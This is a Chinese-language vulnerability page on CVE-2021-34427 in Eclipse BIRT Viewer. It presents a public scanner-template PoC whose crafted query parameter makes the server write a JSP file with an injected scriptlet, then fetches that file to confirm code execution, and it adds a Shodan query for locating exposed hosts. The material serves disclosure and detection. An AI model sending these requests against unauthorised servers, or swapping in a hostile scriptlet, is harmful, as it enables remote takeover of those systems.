CVE-2021-34427: Eclipse BIRT Viewer - Remote Code Execution

日期: 2025-11-21 | 影响软件: Eclipse BIRT Viewer | POC: 已公开

漏洞描述

Eclipse BIRT versions 4.8.0 and earlier contain a JSP injection caused by query parameters, letting remote attackers create and access malicious JSP files in the viewer directory, exploit requires sending crafted query parameters.

PoC代码[已公开]

id: CVE-2021-34427

info:
  name: Eclipse BIRT Viewer - Remote Code Execution
  author: us3r777,Synacktiv
  severity: critical
  description: |
    Eclipse BIRT versions 4.8.0 and earlier contain a JSP injection caused by query parameters, letting remote attackers create and access malicious JSP files in the viewer directory, exploit requires sending crafted query parameters.
  reference:
    - https://bugs.eclipse.org/bugs/show_bug.cgi?id=538142
    - https://sec-consult.com/vulnerability-lab/advisory/remote-code-execution-bypass-eclipse-business-intelligence-reporting-birt/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-34427
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-34427
    epss-score: 0.56777
    epss-percentile: 0.98053
    cwe-id: CWE-434
    cpe: cpe:2.3:a:eclipse:business_intelligence_and_reporting_tools:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: vendor
    product: business_intelligence_and_reporting_tools
    shodan-query: 'http.title:"eclipse birt home"'
  tags: cve,cve2021,birt,rce,file-upload,intrusive,vuln

variables:
  filename: "{{rand_base(20)}}"
  fingerprint: "{{rand_base(20)}}"
  payload: "<%out.println(\"{{fingerprint}}\");%>"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /document?__report=test.rptdesign&sample={{url_encode(payload)}}&__document=./test/{{filename}}.jsp/. HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /test/{{filename}}.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body_1, "The report document file has been generated successfully.")'
          - 'contains(body_2, "{{fingerprint}}")'
          - 'contains(header_2, "text/html")'
        condition: and
# digest: 490a0046304402204f71c65f98cd343d7c202927a35b92a058233c4bdbc62673da9197f6f907c5ac0220699645d3bc7b1952c7f198795dca6cd08c9a94cd9f463ba6c92516cd68de8679:922c64590222798bb761d5b6d8e72950

相关漏洞推荐